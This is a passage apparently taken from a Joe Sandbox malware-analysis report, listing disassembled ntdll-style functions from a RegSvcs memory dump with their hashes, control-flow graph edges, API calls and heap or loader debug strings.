                                                        • Opcode ID: 7857a4d9a05aeee1d7e5921168d8bb6892a0d445905bb023307080d226ad3201
                                                        • Instruction ID: c9399d2679ce112a74a29f8e0e64d0fc4f759bd6c6f3e3b400b29f60060ddb17
                                                        • Opcode Fuzzy Hash: 7857a4d9a05aeee1d7e5921168d8bb6892a0d445905bb023307080d226ad3201
                                                        • Instruction Fuzzy Hash: 65811B71D012699BDB399B54CC54BEAB6B8AF08754F0041EAEA1DB7280D7715E84CFA0
                                                        Function 0112D7B0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 151timeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 650 112d7b0-112d7cd call 1157e54 653 112d7d3-112d7e9 650->653 654 112d8f0-112d8ff 650->654 655 116f2b6-116f2b8 653->655 656 112d7ef-112d7f6 653->656 657 116f2c0-116f2e2 call 117ea12 655->657 656->657 658 112d7fc-112d812 656->658 667 116f2ea-116f303 657->667 659 112d818-112d820 658->659 660 112d93d-112d961 RtlDebugPrintTimes 658->660 662 112d822-112d824 call 1104859 659->662 663 112d829-112d830 659->663 660->655 662->663 666 112d836-112d845 663->666 663->667 669 112d846-112d84c 666->669 667->666 670 116f309-116f30f 667->670 672 112d8c1-112d8cb 669->672 673 112d84e-112d862 669->673 671 112d8cd-112d8da GetPEB 670->671 675 112d8e0-112d8e4 671->675 676 116f332-116f335 671->676 672->671 674 112d900-112d93b call 111dd20 call 111f183 call 112d96f 672->674 673->669 677 112d864-112d86b 673->677 674->671 679 112d8e6 call 112d9d0 675->679 680 112d8eb call 112d978 675->680 676->675 678 116f33b-116f346 call 1181348 676->678 677->669 681 112d86d-112d896 call 111dd20 677->681 678->675 679->680 680->654 692 112d8b6-112d8bf call 111f183 681->692 693 112d898-112d8b4 call 111ddb1 call 112d966 681->693 692->693 693->669
                                                        APIs
                                                        • RtlDebugPrintTimes.NTDLL ref: 0112D959
                                                          • Part of subcall function 01104859: RtlDebugPrintTimes.NTDLL ref: 011048F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$$$p.$)
                                                        • API String ID: 3446177414-2596435465
                                                        • Opcode ID: b4890f9117b7d28719ee1b787cb973ddb074a3bc4e78d64bd9a22ebbd2bfe32a
                                                        • Instruction ID: ec585fc85c68fac041a585cba6caaf5bd997039a947c7c004ab34c69bfefcf2d
                                                        • Opcode Fuzzy Hash: b4890f9117b7d28719ee1b787cb973ddb074a3bc4e78d64bd9a22ebbd2bfe32a
                                                        • Instruction Fuzzy Hash: E9510F71A0435A9FDF2CDFE8E48479DBBB2BF44318F24416DD9156B285D7B0A892CB80
                                                        Function 01144960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 702 1144960-114498e 703 11449b6-11449bd 702->703 704 1144990-11449b0 RtlDebugPrintTimes 702->704 705 11449c3-11449c7 703->705 706 1144a68 703->706 704->703 709 1144a6d-1144a70 704->709 705->706 708 11449cd-11449d5 705->708 706->709 708->706 710 11449db-11449df 708->710 710->706 711 11449e5-11449e8 710->711 711->706 712 11449ea-11449ee 711->712 712->706 713 11449f0-11449f4 712->713 713->706 714 11449f6-1144a4c call 1131e46 call 11489a0 * 3 call 1131e46 713->714 725 1144a63-1144a66 714->725 726 1144a4e-1144a51 714->726 725->706 726->725 727 1144a53-1144a5d 726->727 727->725 728 1144a5f-1144a61 727->728 728->709
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 0ITw$0ITw$0ITw$X
                                                        • API String ID: 3446177414-1798417830
                                                        • Opcode ID: 71182e2a9657671b0fcc236ff2d53649e03f23556e4d6400a8b694877fc2100a
                                                        • Instruction ID: cd7a8a981b73b6f8dd579c039fa2f994c8abdb067175918751aabf0d9130e991
                                                        • Opcode Fuzzy Hash: 71182e2a9657671b0fcc236ff2d53649e03f23556e4d6400a8b694877fc2100a
                                                        • Instruction Fuzzy Hash: D331C03190424EEBCF2AEF98D800B8D3BB1BBC8B58F11402DFD5996255D3709A91CF96
                                                        Function 0112DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1477 112db00-112db15 1478 112db1b-112db22 1477->1478 1479 116f5f9-116f603 1477->1479 1480 112db28-112db2f 1478->1480 1481 116f608-116f619 RtlDebugPrintTimes 1478->1481 1479->1481 1482 112db35-112db39 1480->1482 1483 116f61e-116f628 GetPEB 1480->1483 1481->1483 1487 112db70-112db7b GetPEB 1482->1487 1488 112db3b-112db51 1482->1488 1485 116f647-116f64c call 10fb970 1483->1485 1486 116f62a-116f645 GetPEB call 10fb970 1483->1486 1498 116f651-116f683 call 10fb970 * 3 GetPEB 1485->1498 1486->1498 1493 112db81 1487->1493 1494 116f703-116f706 1487->1494 1488->1487 1491 112db53-112db6a 1488->1491 1491->1487 1497 116f69b-116f69e 1491->1497 1499 112db86-112db89 1493->1499 1494->1493 1495 116f70c-116f71a GetPEB 1494->1495 1495->1499 1500 116f6a6-116f6ae 1497->1500 1501 116f6a0 1497->1501 1523 116f694 1498->1523 1524 116f685-116f68d 1498->1524 1503 116f71f-116f72d GetPEB 1499->1503 1504 112db8f-112db95 1499->1504 1506 116f6b0-116f6b7 call 112ffa0 1500->1506 1507 116f6ba-116f6c1 1500->1507 1501->1500 1503->1504 1505 116f733-116f73a 1503->1505 1505->1504 1506->1507 1510 116f6c4-116f6d7 1507->1510 1514 116f6e6-116f6ef 1510->1514 1515 116f6d9-116f6e4 call 112bba0 1510->1515 1514->1487 1519 116f6f5-116f6fe call 112f3e0 1514->1519 1515->1510 1519->1487 1523->1497 1524->1523
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                        • API String ID: 3446177414-56086060
                                                        • Opcode ID: 8d28f74a5c834e372b4e49381dd0531bf8b676fbe3a79025a0f64a85872a8e2e
                                                        • Instruction ID: 25d0747e3b0ccbe4d43c2cd09dfb68905fb237766b63bc219d9c048fb3fd7b4b
                                                        • Opcode Fuzzy Hash: 8d28f74a5c834e372b4e49381dd0531bf8b676fbe3a79025a0f64a85872a8e2e
                                                        • Instruction Fuzzy Hash: C6418831600752DFDB2EDF68D4A5BAAB7B8FF01724F14806CE5418B691CB74AC91CB81
                                                        Function 01184755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01184888
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01184899
                                                        • LdrpCheckRedirection, xrefs: 0118488F
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 3446177414-3154609507
                                                        • Opcode ID: 9d5943cb8a46caec800479073441ef2afb3f0baaacb39c0a2e7326584529bcb3
                                                        • Instruction ID: 74012c8be688fefa2d488a450d4e54f52d06889da090507e874c0b468b35d214
                                                        • Opcode Fuzzy Hash: 9d5943cb8a46caec800479073441ef2afb3f0baaacb39c0a2e7326584529bcb3
                                                        • Instruction Fuzzy Hash: 7841C6326147529BCB29FF9CD440B267BE4BF4A650F06856DED9497B15EB30D800CF91
                                                        Function 0112DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                        • API String ID: 3446177414-3526935505
                                                        • Opcode ID: c57da471502973807a3c60ec2974f15e53e3d835a1540fe594268519f0e73018
                                                        • Instruction ID: 24695564dab26957a375cb2e4159f30af33bd6e7f7acc38737e552c20a686e33
                                                        • Opcode Fuzzy Hash: c57da471502973807a3c60ec2974f15e53e3d835a1540fe594268519f0e73018
                                                        • Instruction Fuzzy Hash: 89317D31104B95DFDB2EDB6CD819B9677E8FF02714F05405DE4828BA91CBB9A891CB11
                                                        Function 010FC070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $
                                                        • API String ID: 3446177414-3993045852
                                                        • Opcode ID: c1c81f73f1b74ec54622b80c8d00a5a063f586c6e106d870f42347d5f714c1b6
                                                        • Instruction ID: 2edc7b416e8669da6aeead17daee21845d0bd54e4b954f545efda7532296a1bf
                                                        • Opcode Fuzzy Hash: c1c81f73f1b74ec54622b80c8d00a5a063f586c6e106d870f42347d5f714c1b6
                                                        • Instruction Fuzzy Hash: 05110C32904218EFCF19AFA4E84869D7B72FF44765F108529FD26672D0CB716A41CF54
                                                        Function 0112EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f55d00bed9fdcef21a983f3e75b8b46c4ba17c244cfce35d825bf685a6999643
                                                        • Instruction ID: b65e67d4e01981d188919ba8b96fa623a7d78f77984f582d99ac1ab02094c7ad
                                                        • Opcode Fuzzy Hash: f55d00bed9fdcef21a983f3e75b8b46c4ba17c244cfce35d825bf685a6999643
                                                        • Instruction Fuzzy Hash: 19E11F71D00629DFCB29CFA9C980A9DFBF1FF49314F24452AE556A7261D730A852CF11
                                                        Function 0117EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: ce41bde982a80e2894d634b0bd7938c92715c5cdfbd078d382cb868e5c94b8f0
                                                        • Instruction ID: 0d6193c0c96996733e20bebf8356c3d61237dfc56267d05e120fe528c6bc3d55
                                                        • Opcode Fuzzy Hash: ce41bde982a80e2894d634b0bd7938c92715c5cdfbd078d382cb868e5c94b8f0
                                                        • Instruction Fuzzy Hash: 57714571E0021A9FDF09CFA8D984ADEBBF5BF48314F14402AE915EB350D734A906CB60
                                                        Function 0117F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 07cda1adedc3a3f958fb819d453709a6a296f6c8e6f5b7cdd1c142f7ebf99d2a
                                                        • Instruction ID: f692fc233aec022ca1b9ecfe944c3e30cfa6f3a8437faa206a4d77aa68c7f74e
                                                        • Opcode Fuzzy Hash: 07cda1adedc3a3f958fb819d453709a6a296f6c8e6f5b7cdd1c142f7ebf99d2a
                                                        • Instruction Fuzzy Hash: 10511375E0421A9FDF08CF98D845ADEBBB1BF48314F15812AE925A7390D734A942CF64
                                                        Function 01137B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                        • String ID:
                                                        • API String ID: 4281723722-0
                                                        • Opcode ID: 6729422eafa4442c790b53e5d3595c5d35e3de16b7f5af9360fd74176fd21deb
                                                        • Instruction ID: 069fb1a4545a91878cffba6bad8d2ca5981ebfdf0e7d1f6b175e42d22fcdaa41
                                                        • Opcode Fuzzy Hash: 6729422eafa4442c790b53e5d3595c5d35e3de16b7f5af9360fd74176fd21deb
                                                        • Instruction Fuzzy Hash: 36310571E002299FCF29EFA8E885AADBBF1FB48724F10412AE522B7394D7355941CF54
                                                        Function 011059C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 636a5734ebd0cf1656aac0b896776623679a987c25c8a7d765075a6820b96762
                                                        • Instruction ID: 8cf0342c099c332765b66e06ad009e92924325a21170173d20361067ba9992fd
                                                        • Opcode Fuzzy Hash: 636a5734ebd0cf1656aac0b896776623679a987c25c8a7d765075a6820b96762
                                                        • Instruction Fuzzy Hash: 77327970D0426ADFDB6ACF68C944BEDBBB5BF08308F0081E9D549A7281D7B55A84CF91
                                                        Function 01147D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                        • Instruction ID: a172ee15651aae1b94f5dacac1068885d9bb1ee67feb9a303e9c2a5ec14952c4
                                                        • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                        • Instruction Fuzzy Hash: 9491B171E002169BEF2CDF6DC890ABEBBA5FF44B20F54461AE965E72C0D73099418B52
                                                        Function 0111D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Bl$l
                                                        • API String ID: 3446177414-208461968
                                                        • Opcode ID: b10eebdc626e7746114fd068226ae78d6ffd321349990971e3ee2741e0a62ac4
                                                        • Instruction ID: 5a11af650ddd1affc53f700af0b9a3473de21300935a5fab20373dba16ada4c9
                                                        • Opcode Fuzzy Hash: b10eebdc626e7746114fd068226ae78d6ffd321349990971e3ee2741e0a62ac4
                                                        • Instruction Fuzzy Hash: C5A1C271A043298BEF3DDB98D888BADF7A1AB44304F0540F9D90967649DB34AE85CF52
                                                        Function 01145DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 01145E34
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__start
                                                        • String ID: pow
                                                        • API String ID: 3213639722-2276729525
                                                        • Opcode ID: aab681df7933971758d100d30455cb0f3408d4f116338b0e886858d2380cf3fa
